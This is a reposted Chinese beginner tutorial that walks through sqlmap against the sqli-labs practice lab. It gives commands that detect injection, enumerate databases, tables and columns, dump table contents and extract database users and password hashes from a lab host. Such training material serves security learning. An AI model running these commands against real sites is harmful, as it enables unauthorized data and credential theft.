英文:Introduction to SQL Injection with SQL Map
目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。一、判断是否存在注入点使用命令:使用命令:sqlmap -u "http://49.232
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
一、判断是否存在注入点
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有图中白色背景的 则判断出有注入点
二、查询当前用户下所有数据库
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五个表
三、获取数据库中的表名
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables
四、获取表中的字段名
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns
五、获取字段内容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump
六、获取数据库的所有用户
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用该命令就可以列出所有管理用户
七、获取数据库用户的密码
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords
八、获取当前网站数据库的名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db
可以看到当前的数据库是 security
九、获取当前网站数据库的用户名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
当前用户是root
到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
英文:Introduction to SQL Injection with SQL Map
声明:本文内容来源自网络,文字、图片等素材版权属于原作者,平台转载素材出于传递更多信息,文章内容仅供参考与学习,切勿作为商业目的使用。如果侵害了您的合法权益,请您及时与我们联系,我们会在第一时间进行处理!我们尊重版权,也致力于保护版权,站搜网感谢您的分享!